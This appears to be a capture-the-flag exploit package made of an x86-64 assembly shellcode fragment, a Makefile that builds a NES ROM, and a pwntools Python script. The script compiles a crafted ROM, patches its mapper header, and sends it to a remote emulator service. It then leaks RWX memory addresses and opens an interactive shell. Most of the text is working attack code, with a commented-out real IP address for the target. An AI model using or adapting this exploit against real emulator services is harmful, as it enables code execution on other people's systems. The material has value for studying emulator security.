    mov     rsi, rsp
    mov     rdx, 0x100
    syscall
    mov     rdx, rax
    mov     rax, 1
    ;stdout
    mov     rdi, 1
    syscall

all:
	cc65 -O -t c64 pwn.c
	ca65 -t c64 pwn.s
	ca65 -t c64 pwn_asm.s
	cl65 -o ../pwn.nes -t nes pwn.o pwn_asm.o

#!/usr/bin/env python

from pwn import *
from binascii import hexlify
import os

stop = 0x3F3280
offset = 0x3A0000 #checked up to 0x100000 on remote
r = 0

def spawn_remote():
    global r
    #r = remote("91.107.157.58", 3000)
    r = remote("localhost", 1337)

def leak():
    data = r.recvuntil(b"FF", drop=True).decode("utf-8").strip()
    if data:
        print(data)
    data = r.recvuntil(b"ABC",drop=True)
    return u64(data)

def dump():
    i = 0
    print(r.recvuntil(b"DD",drop=True))
    temp = r.recvuntil(b"EE",drop=True)
    print(len(temp))
    data = b''
    for i,b in enumerate(temp):
        if not i%2:
            data += b.to_bytes(1, 'little')

    i = 0
    print(len(data))
    while(i < 0x800):
        lol = u64(data[i:i+8])
        lol2 = u64(data[i+8:i+0x10])
        log.info(f'{hex(i+offset)}: {lol:#0{18}x} {lol2:#0{18}x}')
        if lol == 0x10000000b and lol2 == 0:
            bitch(1)
        i += 0x10

def templated(offset):
    log.info(f"offset: {hex(offset)}")
    pwn_code = ""
    with open("./rom/template.c", "r") as pwn:
        pwn_code = pwn.read()

    pwn_code = pwn_code.replace('XDOFFSET', f'{offset:#0{8}x}')

    with open("./rom/pwn.c", "w") as pwn:
        pwn.write(pwn_code)

def main():
    global r
    global offset
    #for remote enumeration
    #templated(offset)

    os.chdir("./rom")
    os.system("make all")
    os.chdir("..")
    spawn_remote()

    with open("./pwn.nes", "rb") as f:
        data = list(f.read())

        #patch in dream mapper
        data[6] = (data[6] & 0x0f) | (11 << 4) 

        to_send = hexlify(bytes(data))
        #log.info(f"sending data> {to_send}")

        r.sendlineafter(':\n', to_send)

        with open("./test.nes", "wb") as out:
            out.write(bytes(data))

        f.close()

    #dump()
    data = leak()
    log.info(f'rwx: {hex(data)}')
    data = leak()
    log.info(f'm_RAM: {hex(data)}')
    data = leak()
    log.info(f'm_RAM_rwx_off: {hex(data)}')
    r.interactive()
    r.close()
    offset += 0x800

if __name__ == "__main__":
    main()
#r.sendlineafter(b'GGGGG','ls')